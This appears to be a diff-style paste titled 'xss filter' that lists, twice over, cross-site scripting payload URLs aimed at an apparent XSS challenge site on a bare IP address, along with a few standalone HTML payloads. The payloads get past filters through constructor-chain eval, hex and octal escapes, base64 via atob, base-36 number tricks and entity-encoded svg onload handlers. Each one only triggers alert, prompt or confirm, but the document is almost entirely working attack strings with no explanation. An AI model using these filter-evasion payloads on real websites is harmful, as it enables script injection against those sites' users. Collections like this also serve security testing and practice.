nani1337 · January 12, 2018 04:32
diff --git a/xss filter b/xss filter
 http://185.45.192.228/xssChall/3.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es

 http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Efor((i)in(self))eval(i)(1)%3C/script%3E%3EXxxxxx
 http://185.45.192.228/xssChall/4.php?xss=%27%3E%3Cscript%3Eeval(atob(%22cHJvbXB0KDEpOw==%22))%3C/script%3E%3EXxxxxx
 http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Eeval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))%3C/script%3E%3EXxxxxx
 http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3EparseInt(%22prompt%22,36);%3C/script%3E%3EXxxxxx
 http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\141\154\145\162\164(1)%22)();%3C/script%3Es
 http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es
 </noscript>
 <code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
 <link rel='preload'  href='#' as='script' onload='confirm(domain)'>
 http://185.45.192.228/xssChall/6.php?xss=%3C/script%3E%3Cscript%3Efunction%20x%20(x1){document.write(x1);}%20x(%22%3Cscript%3E\141\154\145\162\164(1)%22);%3C/script%3E%3C/script%3E 
 http://185.45.192.228/xssChall/7.php?xss=helloddddd%22%3E%3Csvg%20onload=%22%26%2397%26%23108%26%23101%26%23114%26%23116%26%2340%26%2350%26%2341%22%3Exxx
 http://185.45.192.228/xssChall/7.php?xss=%3Csvg/onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(1)%3E
	http://185.45.192.228/xssChall/3.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es

	http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Efor((i)in(self))eval(i)(1)%3C/script%3E%3EXxxxxx
	http://185.45.192.228/xssChall/4.php?xss=%27%3E%3Cscript%3Eeval(atob(%22cHJvbXB0KDEpOw==%22))%3C/script%3E%3EXxxxxx
	http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3Eeval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))%3C/script%3E%3EXxxxxx
	http://185.45.192.228/xssChall/4.php?xss=hello%22%22%3E%3E%3E%3Cscript%3EparseInt(%22prompt%22,36);%3C/script%3E%3EXxxxxx
	http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\141\154\145\162\164(1)%22)();%3C/script%3Es
	http://185.45.192.228/xssChall/6.php?xss=hello%22%3E%3Cscript%3E(0)[%27constructor%27][%27constructor%27](%22\x61\x6c\x65\x72\x74(1)%22)();%3C/script%3Es
	</noscript>
	<code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
	<link rel='preload' href='#' as='script' onload='confirm(domain)'>
	http://185.45.192.228/xssChall/6.php?xss=%3C/script%3E%3Cscript%3Efunction%20x%20(x1){document.write(x1);}%20x(%22%3Cscript%3E\141\154\145\162\164(1)%22);%3C/script%3E%3C/script%3E
	http://185.45.192.228/xssChall/7.php?xss=helloddddd%22%3E%3Csvg%20onload=%22%26%2397%26%23108%26%23101%26%23114%26%23116%26%2340%26%2350%26%2341%22%3Exxx
	http://185.45.192.228/xssChall/7.php?xss=%3Csvg/onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(1)%3E